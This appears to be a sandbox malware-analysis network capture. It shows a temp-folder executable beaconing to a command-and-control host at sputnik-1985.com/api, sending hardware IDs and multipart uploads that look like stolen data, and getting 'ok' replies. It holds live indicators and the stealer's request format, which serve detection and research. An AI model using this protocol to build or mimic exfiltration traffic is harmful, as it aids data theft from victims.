90031792899d42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1742&rtt_var=673&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1602634&cwnd=212&unsent_bytes=0&cid=69cc6eefd1f98cfd&ts=532&x=0"
2025-01-11 07:11:19 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-11 07:11:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49766	104.21.96.1	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:20 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: sputnik-1985.com
2025-01-11 07:11:20 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-11 07:11:20 UTC	1123	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cq17j04bcsud9sm6221ts78kls; expires=Wed, 07 May 2025 00:57:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2ztTenj5WHlyxfW1m40Qd%2F55Fyud0%2B7TRJc2YKqhwiH1k8pJAQtmD9WVxIZ87RyTSxv27HsKgZkOGKdJdPNQpw%2B%2FJjtrS88gRACqLS333hOyKCi9FWrijVw3Xi0mqe6HrEJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900317990f2d4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1522&rtt_var=871&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=974&delivery_rate=1071953&cwnd=240&unsent_bytes=0&cid=4044f9a2f15a8f09&ts=498&x=0"
2025-01-11 07:11:20 UTC	246	IN	Data Raw: 34 63 39 30 0d 0a 48 6f 6f 4c 57 32 4e 37 38 43 32 48 56 4e 6f 48 76 38 39 42 42 31 37 4d 71 59 34 32 54 65 41 47 32 63 4c 76 4e 61 69 4a 6f 63 46 6c 71 48 31 35 57 55 2f 63 44 2f 51 78 2b 44 33 4c 76 54 52 69 63 75 37 49 36 68 52 33 68 6d 65 31 73 59 6f 5a 69 76 2f 4d 34 79 54 73 61 6a 63 51 48 74 77 50 34 69 7a 34 50 65 53 30 59 32 49 77 37 70 4f 73 55 79 65 43 5a 37 57 67 6a 6c 37 48 2b 63 32 69 64 75 5a 73 4d 77 59 59 6c 45 7a 72 4f 62 39 69 32 71 34 72 61 54 65 68 77 65 4d 55 59 63 4a 6a 6f 2b 44 56 46 2b 58 73 31 61 42 54 36 33 67 77 51 51 62 63 56 71 55 78 74 43 57 46 37 53 42 69 50 4b 44 50 36 6c 30 6c 69 47 36 39 6f 59 74 66 32 4f 44 48 71 58 62 6f 62 7a 49 4d 45 59 42 42 34 54 36 30 5a 4e 43 75 59 79 74 38 71 64 4f 73 Data Ascii: 4c90HooLW2N78C2HVNoHv89BB17MqY42TeAG2cLvNaiJocFlqH15WU/cD/Qx+D3LvTRicu7I6hR3hme1sYoZiv/M4yTsajcQHtwP4iz4PeS0Y2Iw7pOsUyeCZ7Wgjl7H+c2iduZsMwYYlEzrOb9i2q4raTehweMUYcJjo+DVF+Xs1aBT63gwQQbcVqUxtCWF7SBiPKDP6l0liG69oYtf2ODHqXbobzIMEYBB4T60ZNCuYyt8qdOs
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 44 47 2f 52 56 72 69 78 6e 45 4c 48 2b 38 58 6a 59 36 5a 77 65 51 59 56 30 68 65 6c 50 72 52 72 32 4b 34 73 59 6a 32 75 32 65 4e 55 4c 49 70 73 76 36 71 43 57 4d 58 6c 79 61 52 30 34 57 34 32 42 68 47 55 51 4f 5a 32 39 69 58 61 74 57 4d 39 66 49 37 62 37 31 63 37 6a 33 58 37 76 38 4e 4f 69 75 7a 50 34 79 53 6f 62 7a 63 41 46 4a 4a 64 37 54 32 7a 59 4d 2b 6d 4b 6d 67 78 72 73 62 6d 57 79 79 43 59 37 47 71 67 6c 33 4f 35 73 36 6c 66 4f 67 70 64 30 45 65 69 67 2b 39 64 70 74 67 7a 61 6f 76 63 33 36 55 69 2f 4d 61 4e 73 4a 6a 74 2b 44 56 46 38 4c 75 77 4b 42 33 35 32 6f 78 43 67 75 53 58 65 4d 37 76 58 66 62 71 43 31 76 50 37 7a 42 34 6c 49 73 69 32 2b 79 70 59 70 54 69 71 57 44 70 47 53 6f 4d 58 6b 67 46 4a 6c 44 37 79 47 34 4a 63 4c 6a 4f 69 55 37 6f 6f 75 Data Ascii: DG/RVrixnELH+8XjY6ZweQYV0helPrRr2K4sYj2u2eNULIpsv6qCWMXlyaR04W42BhGUQOZ29iXatWM9fI7b71c7j3X7v8NOiuzP4ySobzcAFJJd7T2zYM+mKmgxrsbmWyyCY7Gqgl3O5s6lfOgpd0Eeig+9dptgzaovc36Ui/MaNsJjt+DVF8LuwKB352oxCguSXeM7vXfbqC1vP7zB4lIsi2+ypYpTiqWDpGSoMXkgFJlD7yG4JcLjOiU7oou
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 32 6a 37 37 73 31 51 30 71 75 62 34 31 62 72 66 54 6f 4c 57 36 64 4d 36 7a 69 2f 63 35 32 79 62 58 78 38 71 63 65 73 44 47 2b 50 5a 62 4f 6d 6e 31 6a 48 36 4d 32 74 63 2b 31 6d 4d 51 45 5a 6e 30 72 68 50 62 4e 6d 30 4b 6b 78 62 7a 79 6d 7a 75 31 65 4a 63 49 71 2b 36 65 56 46 35 4b 72 38 72 52 33 71 6c 77 36 44 78 65 56 57 61 55 70 39 6e 79 64 71 69 38 6c 5a 4f 37 47 35 46 45 71 6a 57 57 78 72 6f 68 64 78 75 50 4e 6f 47 37 6e 62 54 6b 4e 45 5a 68 43 36 7a 4b 77 62 4e 61 6d 4a 57 55 39 70 49 75 69 46 43 69 61 4a 4f 50 67 75 56 44 47 35 73 7a 68 53 65 74 6e 4e 77 59 50 30 6c 43 72 4c 2f 68 69 30 65 31 37 4a 54 43 6e 79 2b 64 65 4b 34 4a 6a 74 71 57 4f 55 4d 6e 6d 78 4b 6c 79 37 32 30 31 43 42 53 55 54 2b 49 79 76 58 66 59 70 43 39 70 66 4f 43 4c 36 30 78 76 Data Ascii: 2j77s1Q0qub41brfToLW6dM6zi/c52ybXx8qcesDG+PZbOmn1jH6M2tc+1mMQEZn0rhPbNm0Kkxbzymzu1eJcIq+6eVF5Kr8rR3qlw6DxeVWaUp9nydqi8lZO7G5FEqjWWxrohdxuPNoG7nbTkNEZhC6zKwbNamJWU9pIuiFCiaJOPguVDG5szhSetnNwYP0lCrL/hi0e17JTCny+deK4JjtqWOUMnmxKly7201CBSUT+IyvXfYpC9pfOCL60xv
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 65 42 46 35 4b 72 79 71 70 75 35 6d 63 77 44 42 2b 61 53 4f 73 37 73 32 50 57 71 69 52 6a 4d 61 62 47 36 56 63 75 68 6d 36 70 6f 34 5a 64 78 2b 47 44 37 54 7a 76 63 58 6c 5a 57 62 56 44 7a 43 61 6a 64 38 76 74 50 43 73 6c 37 73 7a 67 46 48 66 43 5a 37 53 70 67 6c 2f 43 35 4d 79 6e 63 75 35 76 4e 41 51 57 6d 46 33 74 4f 4c 56 75 30 71 59 78 5a 54 47 71 78 2b 68 63 4a 49 67 6b 39 65 43 4b 54 34 71 7a 67 35 5a 78 35 32 6b 36 46 31 6d 4e 41 66 78 32 76 32 6d 64 39 57 4e 70 4d 71 37 45 34 46 67 6b 69 6d 57 33 72 6f 70 53 77 2b 50 4c 73 58 33 73 59 54 67 50 46 70 4e 4c 34 44 4f 38 59 74 6d 72 4c 43 56 79 37 73 7a 30 46 48 66 43 53 35 79 56 7a 33 62 77 71 39 7a 74 5a 61 68 75 4e 55 46 42 30 6b 50 6d 4f 72 42 71 32 36 51 76 62 7a 57 6c 78 2b 64 51 49 34 74 68 76 Data Ascii: eBF5Kryqpu5mcwDB+aSOs7s2PWqiRjMabG6Vcuhm6po4Zdx+GD7TzvcXlZWbVDzCajd8vtPCsl7szgFHfCZ7Spgl/C5Myncu5vNAQWmF3tOLVu0qYxZTGqx+hcJIgk9eCKT4qzg5Zx52k6F1mNAfx2v2md9WNpMq7E4FgkimW3ropSw+PLsX3sYTgPFpNL4DO8YtmrLCVy7sz0FHfCS5yVz3bwq9ztZahuNUFB0kPmOrBq26QvbzWlx+dQI4thv
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 4d 2b 63 53 71 62 75 5a 6b 4e 67 6b 52 6d 30 37 68 4d 37 56 6a 30 61 63 69 59 6a 4b 67 77 36 77 61 62 34 56 38 2b 2f 6a 4e 64 74 72 77 30 62 56 78 79 57 51 32 51 51 62 63 56 71 55 78 74 43 57 46 37 53 70 33 4f 4b 50 5a 35 56 4d 68 6a 57 65 70 6f 59 42 63 32 4f 7a 4d 70 33 76 6b 62 7a 59 48 47 4a 64 46 36 54 47 39 62 74 4b 68 59 79 74 38 71 64 4f 73 44 47 2b 73 62 36 69 33 6a 6c 6e 42 2f 64 6a 6a 59 36 5a 77 65 51 59 56 30 68 65 6c 4e 62 4e 75 32 61 30 76 5a 54 69 6a 79 2f 35 62 4b 49 56 74 73 4c 4b 48 55 4d 33 67 79 36 68 7a 37 6e 73 31 44 77 75 58 58 66 64 32 39 69 58 61 74 57 4d 39 66 4a 6a 4d 2f 45 51 73 77 46 57 74 6f 35 74 63 78 2b 65 44 76 44 4c 78 4b 54 34 4e 57 63 6f 50 34 7a 6d 78 5a 74 4b 73 4b 6d 6b 78 71 38 4c 70 56 53 6d 47 62 72 47 67 69 31 Data Ascii: M+cSqbuZkNgkRm07hM7Vj0aciYjKgw6wab4V8+/jNdtrw0bVxyWQ2QQbcVqUxtCWF7Sp3OKPZ5VMhjWepoYBc2OzMp3vkbzYHGJdF6TG9btKhYyt8qdOsDG+sb6i3jlnB/djjY6ZweQYV0helNbNu2a0vZTijy/5bKIVtsLKHUM3gy6hz7ns1DwuXXfd29iXatWM9fJjM/EQswFWto5tcx+eDvDLxKT4NWcoP4zmxZtKsKmkxq8LpVSmGbrGgi1
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 75 6a 7a 76 5a 58 6c 5a 57 5a 46 49 35 6a 65 79 62 4e 47 69 4a 47 45 75 70 4d 7a 2b 56 53 36 4a 61 62 65 67 67 46 72 41 36 73 71 75 63 4f 56 75 50 67 34 63 30 67 47 6c 4d 61 41 6c 68 65 30 43 61 44 65 69 6b 4c 59 55 4d 4d 78 39 2b 36 65 42 46 35 4b 72 77 36 6c 35 34 6d 51 36 44 68 71 41 54 75 4d 6b 75 47 6a 58 76 79 6c 75 4f 61 50 47 34 56 63 70 68 47 2b 33 73 6f 52 58 79 65 43 44 37 54 7a 76 63 58 6c 5a 57 62 46 59 38 7a 79 2f 61 63 75 6d 49 6d 59 71 6f 39 75 73 47 6d 2b 54 59 36 72 67 31 55 48 61 2f 4d 53 38 4d 76 45 70 50 67 31 5a 79 67 2f 6a 50 37 35 69 32 36 4d 78 59 44 71 68 78 4f 56 64 4b 34 70 6e 75 36 53 4a 55 4d 2f 6f 7a 36 68 37 36 32 59 39 43 42 65 62 51 4b 56 34 2b 47 4c 46 37 58 73 6c 48 62 58 49 34 46 6c 76 6e 53 71 69 34 49 70 62 69 72 4f Data Ascii: ujzvZXlZWZFI5jeybNGiJGEupMz+VS6JabeggFrA6squcOVuPg4c0gGlMaAlhe0CaDeikLYUMMx9+6eBF5Krw6l54mQ6DhqATuMkuGjXvyluOaPG4VcphG+3soRXyeCD7TzvcXlZWbFY8zy/acumImYqo9usGm+TY6rg1UHa/MS8MvEpPg1Zyg/jP75i26MxYDqhxOVdK4pnu6SJUM/oz6h762Y9CBebQKV4+GLF7XslHbXI4FlvnSqi4IpbirO
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 45 6b 79 46 78 79 56 57 61 63 44 75 32 76 54 71 6a 55 6c 49 35 47 46 72 46 56 76 32 6c 32 69 34 4a 73 58 6b 72 6d 4e 34 32 36 6f 4d 58 6c 47 47 6f 42 64 34 7a 57 75 5a 70 71 54 48 55 49 71 70 4d 7a 38 55 7a 69 4e 4a 50 58 67 67 68 65 53 30 6f 4f 71 65 2f 4e 34 4c 77 77 4a 6c 51 2f 61 65 50 68 39 6e 66 56 6a 55 44 2b 67 78 65 74 43 50 73 39 44 72 61 71 4b 52 38 33 38 7a 4f 4d 79 71 47 39 35 57 55 72 63 44 2b 45 6e 2b 44 32 4e 2f 33 67 77 62 2f 6d 62 76 6b 74 68 6d 79 53 74 34 4e 55 46 68 4b 76 52 34 79 53 6f 4c 6a 6f 54 43 35 52 4d 38 7a 58 2f 57 2b 4f 4b 4f 57 67 36 75 64 72 53 61 69 69 59 61 62 32 33 6e 42 76 66 36 4d 32 74 65 2f 34 70 64 30 45 57 30 68 66 63 64 76 41 6c 34 75 4e 6a 66 58 7a 32 69 39 6c 58 49 59 78 6a 72 62 48 41 63 4e 44 6d 78 62 52 74 Data Ascii: EkyFxyVWacDu2vTqjUlI5GFrFVv2l2i4JsXkrmN426oMXlGGoBd4zWuZpqTHUIqpMz8UziNJPXggheS0oOqe/N4LwwJlQ/aePh9nfVjUD+gxetCPs9DraqKR838zOMyqG95WUrcD+En+D2N/3gwb/mbvkthmySt4NUFhKvR4ySoLjoTC5RM8zX/W+OKOWg6udrSaiiYab23nBvf6M2te/4pd0EW0hfcdvAl4uNjfXz2i9lXIYxjrbHAcNDmxbRt
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 46 65 6b 56 33 33 4d 4c 74 7a 33 75 6f 64 57 78 75 67 7a 4f 31 43 50 35 56 72 68 5a 36 59 56 4d 54 6c 78 4c 56 74 71 43 64 35 44 6c 6e 4b 64 71 56 2b 2b 46 71 54 37 54 73 6c 5a 4f 37 2b 37 31 6f 68 68 58 4b 71 37 61 70 5a 7a 65 72 56 73 32 76 6e 4b 58 64 42 48 39 49 58 74 33 6a 34 59 63 7a 74 65 7a 56 75 39 5a 36 2f 41 33 2f 51 65 2f 57 35 7a 55 47 4b 73 35 48 74 50 50 6f 70 59 55 46 65 6b 56 33 33 4d 4c 74 7a 33 75 6f 64 57 78 75 67 7a 4f 31 43 50 35 56 72 39 49 36 37 64 76 54 56 31 71 42 79 35 6d 34 76 45 46 6e 63 44 2b 70 32 34 46 79 64 35 57 4e 61 63 75 37 54 72 41 78 76 74 32 65 31 72 6f 70 42 32 36 62 6b 72 58 76 70 66 79 6b 57 46 74 31 68 30 78 66 34 4b 35 32 72 59 7a 31 75 34 49 76 6f 52 57 2f 61 4e 4f 6e 37 32 41 53 64 75 35 47 38 4d 76 45 70 4c Data Ascii: FekV33MLtz3uodWxugzO1CP5VrhZ6YVMTlxLVtqCd5DlnKdqV++FqT7TslZO7+71ohhXKq7apZzerVs2vnKXdBH9IXt3j4YcztezVu9Z6/A3/Qe/W5zUGKs5HtPPopYUFekV33MLtz3uodWxugzO1CP5Vr9I67dvTV1qBy5m4vEFncD+p24Fyd5WNacu7TrAxvt2e1ropB26bkrXvpfykWFt1h0xf4K52rYz1u4IvoRW/aNOn72ASdu5G8MvEpL
2025-01-11 07:11:20 UTC	1369	IN	Data Raw: 69 39 7a 47 6f 5a 70 33 6a 59 32 6c 38 39 6f 76 68 52 69 69 53 5a 2f 65 6e 6c 31 43 4b 39 49 32 36 50 50 34 70 59 56 4a 58 30 6c 32 6c 62 76 67 69 30 36 41 69 5a 6a 4b 74 32 66 35 53 4c 4a 52 6e 2f 4a 36 7a 65 74 6a 73 30 36 41 2b 32 57 51 39 46 77 79 52 58 2b 49 49 68 6b 6a 50 71 6a 4e 6d 66 6f 4c 4d 34 56 67 52 76 46 4f 71 70 35 30 56 37 4f 6a 56 6f 44 79 6d 4b 53 46 42 51 64 4a 69 39 7a 47 6f 5a 70 2b 42 4a 47 67 77 37 74 53 69 54 57 2b 55 4a 4f 50 7a 77 78 66 59 71 35 76 6a 4f 2b 74 37 4b 77 63 61 68 45 79 69 43 49 5a 49 7a 36 6f 7a 5a 6e 36 66 78 75 68 43 4f 6f 46 30 76 4a 36 7a 65 74 6a 73 30 36 41 2b 7a 56 4e 37 4d 41 2b 52 54 2b 73 78 2b 43 75 64 74 57 4d 39 66 49 50 5a 36 30 51 73 77 45 47 42 34 72 78 42 79 65 76 4e 70 44 79 6d 4b 54 56 42 51 64 Data Ascii: i9zGoZp3jY2l89ovhRiiSZ/enl1CK9I26PP4pYVJX0l2lbvgi06AiZjKt2f5SLJRn/J6zetjs06A+2WQ9FwyRX+IIhkjPqjNmfoLM4VgRvFOqp50V7OjVoDymKSFBQdJi9zGoZp+BJGgw7tSiTW+UJOPzwxfYq5vjO+t7KwcahEyiCIZIz6ozZn6fxuhCOoF0vJ6zetjs06A+zVN7MA+RT+sx+CudtWM9fIPZ60QswEGB4rxByevNpDymKTVBQd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49777	104.21.96.1	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:22 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VBTBDB2J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12782 Host: sputnik-1985.com
2025-01-11 07:11:22 UTC	12782	OUT	Data Raw: 2d 2d 56 42 54 42 44 42 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 31 30 31 41 39 45 44 44 44 33 34 38 44 44 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 56 42 54 42 44 42 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 42 54 42 44 42 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 56 42 54 42 44 42 32 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 Data Ascii: --VBTBDB2JContent-Disposition: form-data; name="hwid"3A101A9EDDD348DDD0632DF0E28DC412--VBTBDB2JContent-Disposition: form-data; name="pid"2--VBTBDB2JContent-Disposition: form-data; name="lid"4h5VfH----VBTBDB2JContent-Disposition:
2025-01-11 07:11:25 UTC	1125	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jh1qckn1hthc8pn6ikm7055tqh; expires=Wed, 07 May 2025 00:58:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w8yGI1SZYtfTK3iPjEsO%2FYvQGfevj%2F93F%2BN4mAeuYaFYGtUzKNTuQad8cSvWS6Rw6E3czRg8YxZob47QtU6kWwRlNrWB9CV6R6KV9KScYAA7d73aPYGyPlDySnpLH22EXyiH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900317a35d2472a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1938&rtt_var=734&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13712&delivery_rate=1506707&cwnd=212&unsent_bytes=0&cid=fe4178a4d85d458b&ts=3313&x=0"
2025-01-11 07:11:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-11 07:11:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49803	104.21.96.1	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:26 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=R8711981CN6FTIDUSQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15069 Host: sputnik-1985.com
2025-01-11 07:11:26 UTC	15069	OUT	Data Raw: 2d 2d 52 38 37 31 31 39 38 31 43 4e 36 46 54 49 44 55 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 31 30 31 41 39 45 44 44 44 33 34 38 44 44 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 52 38 37 31 31 39 38 31 43 4e 36 46 54 49 44 55 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 38 37 31 31 39 38 31 43 4e 36 46 54 49 44 55 53 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 52 Data Ascii: --R8711981CN6FTIDUSQContent-Disposition: form-data; name="hwid"3A101A9EDDD348DDD0632DF0E28DC412--R8711981CN6FTIDUSQContent-Disposition: form-data; name="pid"2--R8711981CN6FTIDUSQContent-Disposition: form-data; name="lid"4h5VfH----R
2025-01-11 07:11:37 UTC	1136	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 07:11:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rk6pui0bg3it6m1s8sto8kee7d; expires=Wed, 07 May 2025 00:58:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbKJU%2BoPCEYn7xAdSSkJmlbaDUAoq%2FtT6fSvD%2FoVcoXjhf3mtDUWuhFpy5k8277S1mhaKax5R%2Fp2gdlDX3nAmgJJF%2FCV%2F1jYZnBz9Vus1Re5P%2B8yYNMj1hNGbZ5wAZjj%2FCXu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900317bc68f3c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1646&rtt_var=621&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16009&delivery_rate=1756919&cwnd=178&unsent_bytes=0&cid=20f2c321205652d3&ts=11718&x=0"
2025-01-11 07:11:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-11 07:11:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49887	104.21.96.1	443	7940	C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 07:11:38 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9CSXACU1NS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20383 Host: sputnik-1985.com
2025-01-11 07:11:38 UTC	15331	OUT	Data Raw: 2d 2d 39 43 53 58 41 43 55 31 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 31 30 31 41 39 45 44 44 44 33 34 38 44 44 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 39 43 53 58 41 43 55 31 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 43 53 58 41 43 55 31 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 43 53 58 41 43 55 31 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --9CSXACU1NSContent-Disposition: form-data; name="hwid"3A101A9EDDD348DDD0632DF0E28DC412--9CSXACU1NSContent-Disposition: form-data; name="pid"3--9CSXACU1NSContent-Disposition: form-data; name="lid"4h5VfH----9CSXACU1NSContent-Dispo
2025-01-11 07:11:38 UTC	5052	OUT	Data Raw: 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b b1 64 f0 7c 3c 78 3e f8 37 c1 37 Data Ascii: lpQ0/74G6(~`~O\_+d\|<x>77
